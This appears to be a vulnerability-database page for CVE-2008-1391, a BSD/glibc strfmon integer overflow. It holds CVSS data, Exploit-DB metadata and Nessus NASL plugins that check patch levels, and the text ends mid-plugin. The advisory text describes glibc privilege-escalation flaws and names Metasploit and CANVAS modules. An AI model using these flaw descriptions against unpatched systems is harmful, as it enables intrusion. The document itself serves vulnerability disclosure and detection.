Vulnerabilities > CVE-2008-1391 - Numeric Errors vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Multiple integer overflows in libc in NetBSD 4.x, FreeBSD 6.x and 7.x, and probably other BSD and Apple Mac OS platforms allow context-dependent attackers to execute arbitrary code via large values of certain integer fields in the format argument to (1) the strfmon function in lib/libc/stdlib/strfmon.c, related to the GET_NUMBER macro; and (2) the printf function, related to left_prec and right_prec.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 8 | |
| OS | 1 |
Common Weakness Enumeration (CWE)
Exploit-Db
| description | Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness. CVE-2008-1391. Dos exploit for bsd platform |
| id | EDB-ID:31550 |
| last seen | 2016-02-03 |
| modified | 2008-03-27 |
| published | 2008-03-27 |
| reporter | Maksymilian Arciemowicz |
| source | https://www.exploit-db.com/download/31550/ |
| title | Multiple BSD Platforms - 'strfmon' Function Integer Overflow Weakness |
Nessus
NASL family Mandriva Local Security Checks NASL id MANDRIVA_MDVSA-2010-112.NASL description Multiple vulnerabilities was discovered and fixed in glibc : Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). The updated packages have been patched to correct these issues. last seen 2020-06-01 modified 2020-06-02 plugin id 48185 published 2010-07-30 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/48185 title Mandriva Linux Security Advisory : glibc (MDVSA-2010:112) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Mandriva Linux Security Advisory MDVSA-2010:112. # The text itself is copyright (C) Mandriva S.A. # include("compat.inc"); if (description) { script_id(48185); script_version("1.11"); script_cvs_date("Date: 2019/08/02 13:32:53"); script_cve_id("CVE-2009-4880", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830"); script_bugtraq_id(36443, 37885, 40063); script_xref(name:"MDVSA", value:"2010:112"); script_name(english:"Mandriva Linux Security Advisory : glibc (MDVSA-2010:112)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value: "The remote Mandriva Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Multiple vulnerabilities was discovered and fixed in glibc : Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). The updated packages have been patched to correct these issues." ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_cwe_id(255); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc-pdf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-static-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2010.0"); script_set_attribute(attribute:"patch_publication_date", value:"2010/06/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/07/30"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"Mandriva Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux"); if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu); flag = 0; if (rpm_check(release:"MDK2010.0", reference:"glibc-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-devel-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-doc-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-doc-pdf-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-i18ndata-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-profile-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-static-devel-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"glibc-utils-2.10.1-6.5mnb2")) flag++; if (rpm_check(release:"MDK2010.0", reference:"nscd-2.10.1-6.5mnb2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family SuSE Local Security Checks NASL id SUSE_GLIBC-7201.NASL description Several security issues were fixed : - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called last seen 2020-06-01 modified 2020-06-02 plugin id 50377 published 2010-10-28 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/50377 title SuSE 10 Security Update : glibc (ZYPP Patch Number 7201) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The text description of this plugin is (C) Novell, Inc. # if (NASL_LEVEL < 3000) exit(0); include("compat.inc"); if (description) { script_id(50377); script_version ("1.13"); script_cvs_date("Date: 2019/10/25 13:36:40"); script_cve_id("CVE-2008-1391", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856"); script_name(english:"SuSE 10 Security Update : glibc (ZYPP Patch Number 7201)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote SuSE 10 host is missing a security-related patch." ); script_set_attribute( attribute:"description", value: "Several security issues were fixed : - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called 'adjunct passwd' table, mangling it with the rest of passwd columns instead of keeping it in the shadow table. Normally, Solaris will disclose this information only to clients bound to a priviledged port, but when nscd is deployed on the client, getpwnam() would disclose the password hashes to all users. New mode 'adjunct as shadow' can now be enabled in /etc/default/nss that will move the password hashes from the world-readable passwd table to emulated shadow table (that is not cached by nscd). (CVE-2010-0015) Some invalid behavior, crashes and memory leaks were fixed : - nscd in the paranoia mode would crash on the periodic restart in case one of the databases was disabled in the nscd configuration. - When closing a widechar stdio stream, memory would sometimes be leaked. - memcpy() on power6 would errorneously use a 64-bit instruction within 32-bit code in certain corner cases. - jrand48() returns numbers in the wrong range on 64-bit systems: Instead of [-231, +231), the value was always positive and sometimes higher than the supposed upper bound. - Roughly every 300 days of uptime, the times() function would report an error for 4096 seconds, a side-effect of how system calls are implemented on i386. glibc was changed to never report an error and crash an application that would trigger EFAULT by kernel (because of invalid pointer passed to the times() syscall) before. - getifaddrs() would report infiniband interfaces with corrupted ifa_name structure field. - getgroups(-1) normally handles the invalid array size gracefully by setting EINVAL. However, a crash would be triggered in case the code was compiled using '-DFORTIFYSOURCE=2 -O2'. - Pthread cleanup handlers would not always be invoked on thread cancellation (e.g. in RPC code, but also in other parts of glibc that may hang outside of a syscall) - glibc is now compiled with -fasynchronous-unwind-tables. Some other minor issues were fixed : - There was a problem with sprof<->dlopen() interaction due to a missing flag in the internal dlopen() wrapper. - On x86_64, backtrace of a static destructor would stop in the _fini() glibc pseudo-routine, making it difficult to find out what originally triggered the program termination. The routine now has unwind information attached. - glibc-locale now better coexists with sap-locale on upgrades by regenerating the locale/gconv indexes properly." ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2008-1391.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0015.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0296.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0830.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-3847.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-3856.html" ); script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 7201."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(189, 255); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux"); script_set_attribute(attribute:"patch_publication_date", value:"2010/10/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/28"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled."); if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE."); if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages."); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) exit(1, "Failed to determine the architecture type."); if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented."); flag = 0; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-devel-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-html-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-i18ndata-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-info-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"glibc-locale-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, reference:"nscd-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-devel-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-locale-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-devel-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-html-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-i18ndata-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-info-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-locale-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"glibc-profile-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, reference:"nscd-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-devel-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-locale-32bit-2.4-31.77.76.1")) flag++; if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-profile-32bit-2.4-31.77.76.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else exit(0, "The host is not affected.");NASL family SuSE Local Security Checks NASL id SUSE_11_GLIBC-101025.NASL description This update of glibc fixes various bugs and security issues : - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called last seen 2020-06-01 modified 2020-06-02 plugin id 50912 published 2010-12-02 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/50912 title SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SuSE 11 update information. The text itself is # copyright (C) Novell, Inc. # if (NASL_LEVEL < 3000) exit(0); include("compat.inc"); if (description) { script_id(50912); script_version("1.14"); script_cvs_date("Date: 2019/10/25 13:36:39"); script_cve_id("CVE-2008-1391", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856"); script_name(english:"SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote SuSE 11 host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This update of glibc fixes various bugs and security issues : - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called 'adjunct passwd' table, mangling it with the rest of passwd columns instead of keeping it in the shadow table. Normally, Solaris will disclose this information only to clients bound to a priviledged port, but when nscd is deployed on the client, getpwnam() would disclose the password hashes to all users. New mode 'adjunct as shadow' can now be enabled in /etc/default/nss that will move the password hashes from the world-readable passwd table to emulated shadow table (that is not cached by nscd). (CVE-2010-0015) Some invalid behaviour, crashes and memory leaks were fixed : - statfs64() would not function properly on IA64 in ia32el emulation mode. - memcpy() and memset() on power6 would erroneously use a 64-bit instruction within 32-bit code in certain corner cases. - nscd would not load /etc/host.conf properly before performing host resolution - most importantly, multi on in /etc/host.conf would be ignored when nscd was used, breaking e.g. resolving records in /etc/hosts where single name would point at multiple addresses - Removed mapping from lowercase sharp s to uppercase sharp S; uppercase S is not a standardly used letter and causes problems for ISO encodings. Some other minor issues were fixed : - glibc-locale now better coexists with sap-locale on upgrades by regenerating the locale/gconv indexes properly. - Ports 623 and 664 may not be allocated by RPC code automatically anymore since that may clash with ports used on some IPMI network cards. - On x86_64, backtrace of a static destructor would stop in the _fini() glibc pseudo-routine, making it difficult to find out what originally triggered the program termination. The routine now has unwind information attached." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=375315" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=445636" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=513961" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=534828" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=541773" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=569091" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=572188" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=585879" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=592941" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=594263" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=615556" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=646960" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2008-1391.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0015.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0296.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0830.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-3847.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-3856.html" ); script_set_attribute( attribute:"solution", value:"Apply SAT patch number 3392 / 3393 as appropriate." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(189, 255); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-html"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-info"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-locale"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11"); script_set_attribute(attribute:"patch_publication_date", value:"2010/10/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/02"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11"); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", cpu); flag = 0; if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-devel-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-i18ndata-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-locale-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"nscd-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i686", reference:"glibc-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"i686", reference:"glibc-devel-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-devel-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-i18ndata-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-locale-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"nscd-2.9-13.11.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-devel-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-locale-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"nscd-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i686", reference:"glibc-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"i686", reference:"glibc-devel-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-devel-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-locale-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"nscd-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-devel-2.9-13.11.1")) flag++; if 